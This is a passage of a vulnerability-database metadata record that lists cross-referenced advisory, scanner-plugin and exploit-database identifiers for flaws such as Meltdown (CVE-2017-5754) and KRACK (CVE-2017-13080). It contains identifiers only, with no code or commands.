"OPENSUSE-2017-1163.NASL", "OPENSUSE-2017-1194.NASL", "OPENSUSE-2017-1201.NASL", "OPENSUSE-2017-1224.NASL", "OPENSUSE-2017-1317.NASL", "OPENSUSE-2018-118.NASL", "OPENSUSE-2018-1288.NASL", "OPENSUSE-2018-169.NASL", "OPENSUSE-2018-2.NASL", "OPENSUSE-2018-3.NASL", "OPENSUSE-2018-454.NASL", "OPENSUSE-2018-599.NASL", "OPENSUSE-2019-418.NASL", "OPENSUSE-2020-2053.NASL", "OPENSUSE-2020-2059.NASL", "ORACLELINUX_ELSA-2017-2907.NASL", "ORACLELINUX_ELSA-2017-2911.NASL", "ORACLELINUX_ELSA-2018-0007.NASL", "ORACLELINUX_ELSA-2018-0008.NASL", "ORACLELINUX_ELSA-2018-0151.NASL", "ORACLELINUX_ELSA-2018-0512.NASL", "ORACLELINUX_ELSA-2018-1319.NASL", "ORACLELINUX_ELSA-2018-4006.NASL", "ORACLELINUX_ELSA-2018-4011.NASL", "ORACLELINUX_ELSA-2018-4020.NASL", "ORACLELINUX_ELSA-2018-4022.NASL", "ORACLELINUX_ELSA-2018-4025.NASL", "ORACLELINUX_ELSA-2018-4071.NASL", "ORACLELINUX_ELSA-2018-4109.NASL", "ORACLELINUX_ELSA-2018-4110.NASL", "ORACLEVM_OVMSA-2018-0005.NASL", "ORACLEVM_OVMSA-2018-0006.NASL", "ORACLEVM_OVMSA-2018-0008.NASL", "ORACLEVM_OVMSA-2018-0010.NASL", "ORACLEVM_OVMSA-2018-0015.NASL", "ORACLEVM_OVMSA-2018-0016.NASL", "ORACLEVM_OVMSA-2018-0017.NASL", "ORACLEVM_OVMSA-2018-0020.NASL", "ORACLEVM_OVMSA-2018-0021.NASL", "ORACLEVM_OVMSA-2018-0029.NASL", "ORACLEVM_OVMSA-2018-0035.NASL", "ORACLEVM_OVMSA-2018-0218.NASL", "ORACLEVM_OVMSA-2018-0224.NASL", "ORACLEVM_OVMSA-2018-0248.NASL", "ORACLEVM_OVMSA-2020-0039.NASL", "PFSENSE_2_3_5.NASL", "PFSENSE_SA-18_03.NASL", "PHOTONOS_PHSA-2018-1_0-0097.NASL", "PHOTONOS_PHSA-2018-1_0-0097_LINUX.NASL", "PHOTONOS_PHSA-2018-2_0-0010.NASL", "PHOTONOS_PHSA-2018-2_0-0010_LINUX.NASL", "RANCHEROS_1_1_3.NASL", "REDHAT-RHSA-2017-2907.NASL", "REDHAT-RHSA-2017-2911.NASL", "REDHAT-RHSA-2018-0007.NASL", "REDHAT-RHSA-2018-0008.NASL", "REDHAT-RHSA-2018-0009.NASL", "REDHAT-RHSA-2018-0010.NASL", "REDHAT-RHSA-2018-0011.NASL", "REDHAT-RHSA-2018-0016.NASL", "REDHAT-RHSA-2018-0017.NASL", "REDHAT-RHSA-2018-0018.NASL", "REDHAT-RHSA-2018-0020.NASL", "REDHAT-RHSA-2018-0021.NASL", "REDHAT-RHSA-2018-0022.NASL", "REDHAT-RHSA-2018-0044.NASL", "REDHAT-RHSA-2018-0045.NASL", "REDHAT-RHSA-2018-0046.NASL", "REDHAT-RHSA-2018-0047.NASL", "REDHAT-RHSA-2018-0151.NASL", "REDHAT-RHSA-2018-0182.NASL", "REDHAT-RHSA-2018-0292.NASL", "REDHAT-RHSA-2018-0496.NASL", "REDHAT-RHSA-2018-0512.NASL", "REDHAT-RHSA-2018-0654.NASL", "REDHAT-RHSA-2018-1062.NASL", "REDHAT-RHSA-2018-1129.NASL", "REDHAT-RHSA-2018-1319.NASL", "REDHAT-RHSA-2018-1346.NASL", "REDHAT-RHSA-2018-1349.NASL", "REDHAT-RHSA-2018-1350.NASL", "REDHAT-RHSA-2018-1351.NASL", "REDHAT-RHSA-2018-1374.NASL", "SCREENOS_JSA10827_KRACK.NASL", "SLACKWARE_SSA_2017-291-02.NASL", "SLACKWARE_SSA_2018-016-01.NASL", "SL_20171018_WPA_SUPPLICANT_ON_SL6_X.NASL", "SL_20171018_WPA_SUPPLICANT_ON_SL7_X.NASL", "SL_20180103_KERNEL_ON_SL6_X.NASL", "SL_20180103_KERNEL_ON_SL7_X.NASL", "SL_20180125_KERNEL_ON_SL7_X.NASL", "SL_20180313_KERNEL_ON_SL6_X.NASL", "SL_20180410_KERNEL_ON_SL7_X.NASL", "SL_20180508_KERNEL_ON_SL6_X.NASL", "SMB_ADV180002_MSSQL.NASL", "SMB_NT_MS17_OCT_4041676.NASL", "SMB_NT_MS17_OCT_4041681.NASL", "SMB_NT_MS17_OCT_4041689.NASL", "SMB_NT_MS17_OCT_4041690.NASL", "SMB_NT_MS17_OCT_4041691.NASL", "SMB_NT_MS17_OCT_4041693.NASL", "SMB_NT_MS17_OCT_4042895.NASL", "SMB_NT_MS17_OCT_WIN2008.NASL", "SMB_NT_MS18_APR_4093112.NASL", "SMB_NT_MS18_FEB_4074590.NASL", "SMB_NT_MS18_FEB_4074591.NASL", "SMB_NT_MS18_FEB_4074592.NASL", "SMB_NT_MS18_FEB_4074596.NASL", "SMB_NT_MS18_JAN_4056888.NASL", "SMB_NT_MS18_JAN_4056890.NASL", "SMB_NT_MS18_JAN_4056891.NASL", "SMB_NT_MS18_JAN_4056892.NASL", "SMB_NT_MS18_JAN_4056893.NASL", "SMB_NT_MS18_JAN_4056897.NASL", "SMB_NT_MS18_JAN_4056898.NASL", "SMB_NT_MS18_MAR_4088875.NASL", "SMB_NT_MS18_MAR_4088876.NASL", "SMB_NT_MS18_MAR_4088877.NASL", "SUSE_SU-2017-2745-1.NASL", "SUSE_SU-2017-2752-1.NASL", "SUSE_SU-2017-2847-1.NASL", "SUSE_SU-2017-2869-1.NASL", "SUSE_SU-2017-2908-1.NASL", "SUSE_SU-2017-2920-1.NASL", "SUSE_SU-2017-3103-1.NASL", "SUSE_SU-2017-3117-1.NASL", "SUSE_SU-2017-3118-1.NASL", "SUSE_SU-2017-3119-1.NASL", "SUSE_SU-2017-3123-1.NASL", "SUSE_SU-2017-3124-1.NASL", "SUSE_SU-2017-3125-1.NASL", "SUSE_SU-2017-3127-1.NASL", "SUSE_SU-2017-3130-1.NASL", "SUSE_SU-2017-3131-1.NASL", "SUSE_SU-2017-3132-1.NASL", "SUSE_SU-2017-3145-1.NASL", "SUSE_SU-2017-3146-1.NASL", "SUSE_SU-2017-3147-1.NASL", "SUSE_SU-2017-3148-1.NASL", "SUSE_SU-2017-3149-1.NASL", "SUSE_SU-2017-3150-1.NASL", "SUSE_SU-2017-3151-1.NASL", "SUSE_SU-2017-3152-1.NASL", "SUSE_SU-2017-3153-1.NASL", "SUSE_SU-2017-3154-1.NASL", "SUSE_SU-2017-3157-1.NASL", "SUSE_SU-2017-3158-1.NASL", "SUSE_SU-2017-3160-1.NASL", "SUSE_SU-2017-3265-1.NASL", "SUSE_SU-2018-0010-1.NASL", "SUSE_SU-2018-0011-1.NASL", "SUSE_SU-2018-0012-1.NASL", "SUSE_SU-2018-0031-1.NASL", "SUSE_SU-2018-0040-1.NASL", "SUSE_SU-2018-0069-1.NASL", "SUSE_SU-2018-0113-1.NASL", "SUSE_SU-2018-0114-1.NASL", "SUSE_SU-2018-0115-1.NASL", "SUSE_SU-2018-0131-1.NASL", "SUSE_SU-2018-0171-1.NASL", "SUSE_SU-2018-0219-1.NASL", "SUSE_SU-2018-0438-1.NASL", "SUSE_SU-2018-0472-1.NASL", "SUSE_SU-2018-0555-1.NASL", "SUSE_SU-2018-0601-1.NASL", "SUSE_SU-2018-0609-1.NASL", "SUSE_SU-2018-0638-1.NASL", "SUSE_SU-2018-0678-1.NASL", "SUSE_SU-2018-0909-1.NASL", "SUSE_SU-2018-1177-1.NASL", "SUSE_SU-2018-1181-1.NASL", "SUSE_SU-2018-1184-1.NASL", "SUSE_SU-2018-1202-1.NASL", "SUSE_SU-2018-1203-1.NASL", "SUSE_SU-2018-1216-1.NASL", "SUSE_SU-2018-1603-1.NASL", "SUSE_SU-2018-1658-1.NASL", "SUSE_SU-2018-1699-1.NASL", "SUSE_SU-2018-1699-2.NASL", "SUSE_SU-2018-2528-1.NASL", "SUSE_SU-2018-3230-1.NASL", "SUSE_SU-2018-3387-1.NASL", "SUSE_SU-2020-3380-1.NASL", "SUSE_SU-2020-3424-1.NASL", "SUSE_SU-2022-1853-1.NASL", "UBNT_UNIFI_KRACK.NASL", "UBUNTU_USN-3455-1.NASL", "UBUNTU_USN-3505-1.NASL", "UBUNTU_USN-3514-1.NASL", "UBUNTU_USN-3516-1.NASL", "UBUNTU_USN-3522-1.NASL", "UBUNTU_USN-3522-2.NASL", "UBUNTU_USN-3522-3.NASL", "UBUNTU_USN-3522-4.NASL", "UBUNTU_USN-3523-1.NASL", "UBUNTU_USN-3523-2.NASL", "UBUNTU_USN-3524-1.NASL", "UBUNTU_USN-3540-1.NASL", "UBUNTU_USN-3540-2.NASL", "UBUNTU_USN-3541-1.NASL", "UBUNTU_USN-3541-2.NASL", "UBUNTU_USN-3551-1.NASL", "UBUNTU_USN-3583-1.NASL", "UBUNTU_USN-3597-1.NASL", "UBUNTU_USN-3597-2.NASL", "VIRTUOZZO_VZA-2018-002.NASL", "VIRTUOZZO_VZA-2018-003.NASL", "VIRTUOZZO_VZA-2018-006.NASL", "VIRTUOZZO_VZA-2018-029.NASL", "VIRTUOZZO_VZLSA-2017-2907.NASL", "VIRTUOZZO_VZLSA-2017-2911.NASL", "VMWARE_VCENTER_VMSA-2018-0007.NASL", "WMI_INTEL-SA-00101.NBIN", "XEN_SERVER_XSA-254.NASL"]}, {"type": "nvidia", "idList": ["NVIDIA:4601", "NVIDIA:4609", "NVIDIA:4610", "NVIDIA:4611", "NVIDIA:4613", "NVIDIA:4614", "NVIDIA:4616", "NVIDIA:4617"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310107191", "OPENVAS:1361412562310107830", "OPENVAS:1361412562310108254", "OPENVAS:1361412562310108257", "OPENVAS:1361412562310108292", "OPENVAS:1361412562310108766", "OPENVAS:1361412562310108767", "OPENVAS:1361412562310140432", "OPENVAS:1361412562310140451", "OPENVAS:1361412562310140452", "OPENVAS:1361412562310703999", "OPENVAS:1361412562310704078", "OPENVAS:1361412562310704082", "OPENVAS:1361412562310704120", "OPENVAS:1361412562310811865", "OPENVAS:1361412562310811921", "OPENVAS:1361412562310811925", "OPENVAS:1361412562310811927", "OPENVAS:1361412562310811950", "OPENVAS:1361412562310811959", "OPENVAS:1361412562310812016", "OPENVAS:1361412562310812022", "OPENVAS:1361412562310812026", "OPENVAS:1361412562310812042", "OPENVAS:1361412562310812044", "OPENVAS:1361412562310812258", "OPENVAS:1361412562310812284", "OPENVAS:1361412562310812285", "OPENVAS:1361412562310812289", "OPENVAS:1361412562310812290", "OPENVAS:1361412562310812291", "OPENVAS:1361412562310812292", "OPENVAS:1361412562310812293", "OPENVAS:1361412562310812294", "OPENVAS:1361412562310812295", "OPENVAS:1361412562310812296", "OPENVAS:1361412562310812384", "OPENVAS:1361412562310812386", "OPENVAS:1361412562310812397", "OPENVAS:1361412562310812398", "OPENVAS:1361412562310812400", "OPENVAS:1361412562310812401", "OPENVAS:1361412562310812408", "OPENVAS:1361412562310812662", "OPENVAS:1361412562310812740", "OPENVAS:1361412562310813652", "OPENVAS:1361412562310814014", "OPENVAS:1361412562310815020", "OPENVAS:1361412562310815033", "OPENVAS:1361412562310815034", "OPENVAS:1361412562310843342", "OPENVAS:1361412562310843392", "OPENVAS:1361412562310843405", "OPENVAS:1361412562310843406", "OPENVAS:1361412562310843409", "OPENVAS:1361412562310843410", "OPENVAS:1361412562310843412", "OPENVAS:1361412562310843413", "OPENVAS:1361412562310843414", "OPENVAS:1361412562310843415", "OPENVAS:1361412562310843418", "OPENVAS:1361412562310843423", "OPENVAS:1361412562310843424", "OPENVAS:1361412562310843427", "OPENVAS:1361412562310843429", "OPENVAS:1361412562310843437", "OPENVAS:1361412562310843461", "OPENVAS:1361412562310843473", "OPENVAS:1361412562310843474", "OPENVAS:1361412562310851627", "OPENVAS:1361412562310851632", "OPENVAS:1361412562310851636", "OPENVAS:1361412562310851638", "OPENVAS:1361412562310851654", "OPENVAS:1361412562310851677", "OPENVAS:1361412562310851678", "OPENVAS:1361412562310851693", "OPENVAS:1361412562310851704", "OPENVAS:1361412562310851742", "OPENVAS:1361412562310851978", "OPENVAS:1361412562310852089", "OPENVAS:1361412562310873510", "OPENVAS:1361412562310873515", "OPENVAS:1361412562310873647", "OPENVAS:1361412562310873667", "OPENVAS:1361412562310873699", "OPENVAS:1361412562310873957", "OPENVAS:1361412562310873984", "OPENVAS:1361412562310874059", "OPENVAS:1361412562310874088", "OPENVAS:1361412562310882787", "OPENVAS:1361412562310882788", "OPENVAS:1361412562310882822", "OPENVAS:1361412562310882836", "OPENVAS:1361412562310882855", "OPENVAS:1361412562310882875", "OPENVAS:1361412562310891150", "OPENVAS:1361412562310891232", "OPENVAS:1361412562310891573", "OPENVAS:1361412562311220171241", "OPENVAS:1361412562311220171242", "OPENVAS:1361412562311220181001", "OPENVAS:1361412562311220181002", "OPENVAS:1361412562311220181236", "OPENVAS:1361412562311220191414", "OPENVAS:1361412562311220191422", "OPENVAS:1361412562311220191514", "OPENVAS:1361412562311220191539", "OPENVAS:1361412562311220191637", "OPENVAS:1361412562311220191638", "OPENVAS:1361412562311220192274", "OPENVAS:1361412562311220201674"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2018", "ORACLE:CPUAPR2018-3678067", "ORACLE:CPUAPR2019", "ORACLE:CPUAPR2019-5072813", "ORACLE:CPUAPR2020", "ORACLE:CPUJAN2018", "ORACLE:CPUJAN2018-3236628", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2018-4258247"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-2907", "ELSA-2017-2911", "ELSA-2018-0007", "ELSA-2018-0008", "ELSA-2018-0151", "ELSA-2018-0169", "ELSA-2018-0292", "ELSA-2018-1062", "ELSA-2018-1319", "ELSA-2018-1854", "ELSA-2018-4006", "ELSA-2018-4011", "ELSA-2018-4012", "ELSA-2018-4020", "ELSA-2018-4021", "ELSA-2018-4022", "ELSA-2018-4025", "ELSA-2018-4071", "ELSA-2018-4109", "ELSA-2018-4110", "ELSA-2018-4285", "ELSA-2018-4289", "ELSA-2019-4585", "ELSA-2019-4630", "ELSA-2019-4702", "ELSA-2019-4732", "ELSA-2021-9034"]}, {"type": "osv", "idList": ["OSV:DLA-1150-1", "OSV:DLA-1200-1", "OSV:DLA-1232-1", "OSV:DLA-1573-1", "OSV:DSA-3999-1", "OSV:DSA-4078-1", "OSV:DSA-4082-1", "OSV:DSA-4120-1", "OSV:DSA-4120-2"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145363", "PACKETSTORM:145364", "PACKETSTORM:145876", "PACKETSTORM:153148"]}, {"type": "paloalto", "idList": ["PAN-SA-2018-0001"]}, {"type": "photon", "idList": ["PHSA-2018-0010", "PHSA-2018-0097", "PHSA-2018-1.0-0097"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:02EAB5AF6104A4960F7E3B105CD50FA1", "QUALYSBLOG:3ACE52E54FF5FE3EF1B0FC328181FA66", "QUALYSBLOG:832B33D45F45271E91CA6542BC9CFD59", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:BD020D07BF02B0790C62701D997BFD4D", "QUALYSBLOG:C9F2432F760D960CF69CDC55D87263A8", "QUALYSBLOG:D893D4DFB7141FDAD0BE869440074392", "QUALYSBLOG:E761CF659F35F9F5C29FB50D76B98C3E", "QUALYSBLOG:F7C32BA5E6651A8CE3584BB84A88A0C0", "QUALYSBLOG:F8AA5B21D90BCDD30391A24D6FD47892"]}, {"type": "redhat", "idList": ["RHSA-2017:2907", "RHSA-2017:2911", "RHSA-2018:0007", "RHSA-2018:0008", "RHSA-2018:0009", "RHSA-2018:0010", "RHSA-2018:0011", "RHSA-2018:0016", "RHSA-2018:0017", "RHSA-2018:0018", "RHSA-2018:0020", "RHSA-2018:0021", "RHSA-2018:0022", "RHSA-2018:0044", "RHSA-2018:0045", "RHSA-2018:0046", "RHSA-2018:0047", "RHSA-2018:0089", "RHSA-2018:0090", "RHSA-2018:0091", "RHSA-2018:0092", "RHSA-2018:0151", "RHSA-2018:0182", "RHSA-2018:0292", "RHSA-2018:0464", "RHSA-2018:0496", "RHSA-2018:0502", "RHSA-2018:0512", "RHSA-2018:0654", "RHSA-2018:1062", "RHSA-2018:1129", "RHSA-2018:1319", "RHSA-2018:1346", "RHSA-2018:1374", "RHSA-2019:1046"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-13077", "RH:CVE-2017-13080", "RH:CVE-2017-13856", "RH:CVE-2017-13866", "RH:CVE-2017-13870", "RH:CVE-2017-5715", "RH:CVE-2017-5754", "RH:CVE-2017-7156", "RH:CVE-2017-7157", "RH:CVE-2018-19965", "RH:CVE-2018-3620"]}, {"type": "securelist", "idList": ["SECURELIST:7CF4DDEB1B5407DAA24EC25BAA7A9654", "SECURELIST:FC1216FC2096CBEE31E247C19D68BEC5"]}, {"type": "seebug", "idList": ["SSV:96986", "SSV:96989", "SSV:96990", "SSV:96991", "SSV:97059", "SSV:97093"]}, {"type": "slackware", "idList": ["SSA-2017-291-02", "SSA-2018-016-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:2755-1", "OPENSUSE-SU-2017:2846-1", "OPENSUSE-SU-2017:2896-1", "OPENSUSE-SU-2017:2905-1", "OPENSUSE-SU-2017:3144-1", "OPENSUSE-SU-2018:0022-1", "OPENSUSE-SU-2018:0023-1", "OPENSUSE-SU-2018:0326-1", "OPENSUSE-SU-2018:0459-1", "OPENSUSE-SU-2018:1274-1", "OPENSUSE-SU-2018:1623-1", "OPENSUSE-SU-2018:3473-1", "OPENSUSE-SU-2020:2053-1", "OPENSUSE-SU-2020:2059-1", "SUSE-SU-2017:2745-1", "SUSE-SU-2017:2752-1", "SUSE-SU-2017:2847-1", "SUSE-SU-2017:2869-1", "SUSE-SU-2017:2908-1", "SUSE-SU-2017:2920-1", "SUSE-SU-2017:3072-1", "SUSE-SU-2017:3074-1", "SUSE-SU-2017:3076-1", "SUSE-SU-2017:3103-1", "SUSE-SU-2017:3106-1", "SUSE-SU-2017:3116-1", "SUSE-SU-2017:3117-1", "SUSE-SU-2017:3118-1", "SUSE-SU-2017:3119-1", "SUSE-SU-2017:3120-1", "SUSE-SU-2017:3121-1", "SUSE-SU-2017:3122-1", "SUSE-SU-2017:3123-1", "SUSE-SU-2017:3124-1", "SUSE-SU-2017:3125-1", "SUSE-SU-2017:3126-1", "SUSE-SU-2017:3127-1", "SUSE-SU-2017:3128-1", "SUSE-SU-2017:3129-1", "SUSE-SU-2017:3130-1", "SUSE-SU-2017:3131-1", "SUSE-SU-2017:3132-1", "SUSE-SU-2017:3134-1", "SUSE-SU-2017:3136-1", "SUSE-SU-2017:3139-1", "SUSE-SU-2017:3145-1", "SUSE-SU-2017:3146-1", "SUSE-SU-2017:3147-1", "SUSE-SU-2017:3148-1", "SUSE-SU-2017:3149-1", "SUSE-SU-2017:3150-1", "SUSE-SU-2017:3151-1", "SUSE-SU-2017:3152-1", "SUSE-SU-2017:3153-1", "SUSE-SU-2017:3154-1", "SUSE-SU-2017:3156-1", "SUSE-SU-2017:3157-1", "SUSE-SU-2017:3158-1", "SUSE-SU-2017:3159-1", "SUSE-SU-2017:3160-1", "SUSE-SU-2017:3165-1", "SUSE-SU-2017:3265-1", "SUSE-SU-2017:3267-1", "SUSE-SU-2018:0010-1", "SUSE-SU-2018:0011-1", "SUSE-SU-2018:0012-1", "SUSE-SU-2018:0031-1", "SUSE-SU-2018:0040-1", "SUSE-SU-2018:0069-1", "SUSE-SU-2018:0113-1", "SUSE-SU-2018:0114-1", "SUSE-SU-2018:0115-1", "SUSE-SU-2018:0131-1", "SUSE-SU-2018:0171-1", "SUSE-SU-2018:0180-1", "SUSE-SU-2018:0213-1", "SUSE-SU-2018:0219-1", "SUSE-SU-2018:0438-1", "SUSE-SU-2018:0472-1", "SUSE-SU-2018:0555-1", "SUSE-SU-2018:0601-1", "SUSE-SU-2018:0609-1", "SUSE-SU-2018:0638-1", "SUSE-SU-2018:0678-1", "SUSE-SU-2018:0909-1", "SUSE-SU-2018:1177-1", "SUSE-SU-2018:1181-1", "SUSE-SU-2018:1184-1", "SUSE-SU-2018:1202-1", "SUSE-SU-2018:1203-1", "SUSE-SU-2018:1216-1"]}, {"type": "symantec", "idList": ["SMNTC-102371", "SMNTC-102378", "SMNTC-1426"]}, {"type": "talosblog", "idList": ["TALOSBLOG:6AF8BBB020A686E442B50095CA9B7A36"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:37F5AF86E0886FC0FBDCCE15A1236586"]}, {"type": "thn", "idList": ["THN:29EC2E0BD61CF15B2E756ECA04EDFF50", "THN:58CFE19533148E77597FE0AC59963145", "THN:71C19B8F2C6EDB0AFDA5AA0280A20C00", "THN:788E9312DDA39D9A09855DF379A0FD4D", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:C4C9BC61AD42FB9F46B30ECA56F71393"]}, {"type": "threatpost", "idList": ["THREATPOST:0F9EDE9A622A021B9B79C50214D7E8AD", "THREATPOST:590758261828FF8DBC9F74588FAD3DE5", "THREATPOST:6C364316788D445329E5596C5108A157", "THREATPOST:7458AE86ECA810D873D5D35916A93D9F", "THREATPOST:CE89F855271AB3AE3CE8B5B0C141CDC2", "THREATPOST:DB0542CFA474B0D9C91032709EDE296D", "THREATPOST:E454192F36C2E44BAE14AB9B62BE28DB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}, {"type": "ubuntu", "idList": ["USN-3455-1", "USN-3505-1", "USN-3514-1", "USN-3516-1", "USN-3522-1", "USN-3522-2", "USN-3522-3", "USN-3522-4", "USN-3523-1", "USN-3523-2", "USN-3524-1", "USN-3524-2", "USN-3525-1", "USN-3540-1", "USN-3540-2", "USN-3541-1", "USN-3541-2", "USN-3551-1", "USN-3583-1", "USN-3597-1", "USN-3597-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-13080", "UB:CVE-2017-13856", "UB:CVE-2017-13866", "UB:CVE-2017-13870", "UB:CVE-2017-13884", "UB:CVE-2017-13885", "UB:CVE-2017-5729", "UB:CVE-2017-5754", "UB:CVE-2017-7153", "UB:CVE-2017-7156", "UB:CVE-2017-7157", "UB:CVE-2017-7160", "UB:CVE-2017-7165", "UB:CVE-2018-10471", "UB:CVE-2018-19965"]}, {"type": "virtuozzo", "idList": ["VZA-2018-001", "VZA-2018-002", "VZA-2018-003", "VZA-2018-006", "VZA-2018-028", "VZA-2018-029"]}, {"type": "vmware", "idList": ["VMSA-2018-0007", "VMSA-2018-0007.6"]}, {"type": "xen", "idList": ["XSA-254", "XSA-279"]}, {"type": "zdi", "idList": ["ZDI-18-146", "ZDI-18-147", "ZDI-18-148", "ZDI-18-149", "ZDI-18-150", "ZDI-18-151", "ZDI-18-152", "ZDI-18-153", "ZDI-18-154", "ZDI-18-155", "ZDI-18-156"]}, {"type": "zdt", "idList": ["1337DAY-ID-29198", "1337DAY-ID-29199", "1337DAY-ID-29200", "1337DAY-ID-29202", "1337DAY-ID-29460", "1337DAY-ID-29634", "1337DAY-ID-29935", "1337DAY-ID-32059", "1337DAY-ID-32828"]}]}, "score": {"value": 0.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "aix", "idList": ["SPECTRE_MELTDOWN_ADVISORY.ASC"]}, {"type": "amazon", "idList": ["ALAS-2018-939"]}, {"type": "androidsecurity", "idList": ["ANDROID:2017-11-01", "ANDROID:2018-05-01", "ANDROID:2018-09-01", "ANDROID:2018-12-01"]}, {"type": "apple", "idList": ["APPLE:05865687B681A94EDACF5CD84F56F0EF", "APPLE:076A5029E1D9073AD8A212C272CBA098", "APPLE:121C0C2C932F899F870D9D5665610ED0", "APPLE:31324259F2722EDCDF4BD19554187E7A", "APPLE:3CD8680715FC8DF4A758CC6012471868", "APPLE:718D8AEEB116992EF0FD8052E050FE9A", "APPLE:A906ED60E2875C343BE4CB7524339858", "APPLE:B3402276360A8C507F94E26E15D465F4", "APPLE:B7AA5B9368DE4BD135A602B017EB0259", "APPLE:B8F16B37FC64788E8894EE9818D392DA", "APPLE:CE1834F14896537612441EAFB62595C9", "APPLE:D5B2B0A52189C378A357D40438F75CF8", "APPLE:F6306C158D7B30BA0A0EDD411C414BFE", "APPLE:FAC8B05FC20C773432450AA689A274D6", "APPLE:FAE8F6548DA345F4466BB73DD8BE2763", "APPLE:HT208219", "APPLE:HT208220", "APPLE:HT208222", "APPLE:HT208258", "APPLE:HT208324", "APPLE:HT208325", "APPLE:HT208326", "APPLE:HT208328", "APPLE:HT208331", "APPLE:HT208334", "APPLE:HT208354", "APPLE:HT208465", "APPLE:HT208692", "APPLE:HT208847"]}, {"type": "archlinux", "idList": ["ASA-201710-22", "ASA-201710-23", "ASA-201801-1", "ASA-201801-4", "ASA-201801-6"]}, {"type": "centos", "idList": ["CESA-2017:2907", "CESA-2018:0007", "CESA-2018:0008", "CESA-2018:1319"]}, {"type": "cert", "idList": ["VU:228519", "VU:584653"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0011"]}, {"type": "cisco", "idList": ["CISCO-SA-20171016-WPA", "CISCO-SA-20180104-CPUSIDECHANNEL"]}, {"type": "citrix", "idList": ["CTX231390", "CTX234679"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:08639CF3E8D6C946D02AFEE0F4B5B0A0", "CFOUNDRY:1A91EDE432C17AF89F8A4DC15F5D5A55", "CFOUNDRY:86B5C35F8F0E334D1CCCDAF1214EDFEF", "CFOUNDRY:8730FEC9F4689F70DBBC5917AC5BF0C6"]}, {"type": "cve", "idList": ["CVE-2017-13080", "CVE-2017-5754"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1150-1:A6833", "DEBIAN:DLA-1200-1:A0B61", "DEBIAN:DLA-1232-1:15F37", "DEBIAN:DSA-3999-1:C5D5F", "DEBIAN:DSA-4078-1:83863", "DEBIAN:DSA-4082-1:57979", "DEBIAN:DSA-4120-1:7BEB7"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-13080"]}, {"type": "exploitdb", "idList": ["EDB-ID:44234"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:415A901F9BC5DABDC36EDFC6E3924DAC"]}, {"type": "f5", "idList": ["F5:K23642330", "F5:K91229003"]}, {"type": "fedora", "idList": ["FEDORA:0DD9C604DD0F", "FEDORA:1714A6074A50", "FEDORA:8E50360491B7", "FEDORA:AA0BE60A8642", "FEDORA:B0AFE6075EE6", "FEDORA:F117D6006273", "FEDORA:F21276042F34"]}, {"type": "fortinet", "idList": ["FG-IR-17-196", "FG-IR-18-002"]}, {"type": "freebsd", "idList": ["1CE95BC7-3278-11E8-B527-00012E582166", "74DAA370-2797-11E8-95EC-A4BADB2F4699", "D670A953-B2A1-11E7-A633-009C02A2AB30"]}, {"type": "gentoo", "idList": ["GLSA-201711-03", "GLSA-201801-09"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:37170621F78D33B9DDE68A73E0A16294", "GOOGLEPROJECTZERO:42FBA08807698DC5CD34486014AC8332", "GOOGLEPROJECTZERO:8F5F85400267DF1EFD1897A0E2FF0671"]}, {"type": "hackerone", "idList": ["H1:286740"]}, {"type": "hp", "idList": ["HP:C05843704", "HP:C05869091", "HP:C05872536", "HP:C05876244", "HP:C05963224"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20171117-01-WPA", "HUAWEI-SA-20180106-01-CPU"]}, {"type": "ibm", "idList": ["A594E3179D9A187B5EAE777411B4109CB85600F1AEC96905951B67E4F825EC64"]}, {"type": "ics", "idList": ["ICSA-17-318-01A", "ICSA-17-318-01B", "ICSA-17-318-01C", "ICSA-17-318-02"]}, {"type": "kaspersky", "idList": ["KLA11279"]}, {"type": "kitploit", "idList": ["KITPLOIT:8752367943592764867", "KITPLOIT:8917740741292426205"]}, {"type": "krebs", "idList": ["KREBS:6CB809D95C62C82983AC457CB4B0CBB1"]}, {"type": "lenovo", "idList": ["LENOVO:PS500143-NOSID", "LENOVO:PS500151-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3DDE32E41BE8356C194673EE3ED7FDBE", "MALWAREBYTES:C47D8F4321BF60FB315B6C46B47DF46F"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_CREATETHIS"]}, {"type": "mscve", "idList": ["MS:ADV180002", "MS:ADV180018", "MS:CVE-2017-13080"]}, {"type": "mskb", "idList": ["KB4467708", "KB4493448"]}, {"type": "myhack58", "idList": ["MYHACK58:62201789609"]}, {"type": "nessus", "idList": ["AIX_IJ03029.NASL", "AIX_IJ03030.NASL", "AIX_IJ03032.NASL", "AIX_IJ03033.NASL", "AIX_IJ03034.NASL", "AIX_IJ03035.NASL", "AIX_IJ03036.NASL", "AL2_ALAS-2018-939.NASL", "ALA_ALAS-2018-939.NASL", "APPLETV_11_2.NASL", "ARUBAOS_KRACK.NASL", "CENTOS_RHSA-2018-0007.NASL", "CENTOS_RHSA-2018-0008.NASL", "CENTOS_RHSA-2018-1319.NASL", "CISCO-SA-20171016-WPA-ASA_WITH_FIREPOWER_SERVICES.NASL", "CITRIX_XENSERVER_CTX231390.NASL", "CITRIX_XENSERVER_CTX234679.NASL", "DEBIAN_DLA-1200.NASL", "DEBIAN_DLA-1232.NASL", "DEBIAN_DSA-3999.NASL", "DEBIAN_DSA-4078.NASL", "DEBIAN_DSA-4082.NASL", "DEBIAN_DSA-4120.NASL", "EULEROS_SA-2017-1241.NASL", 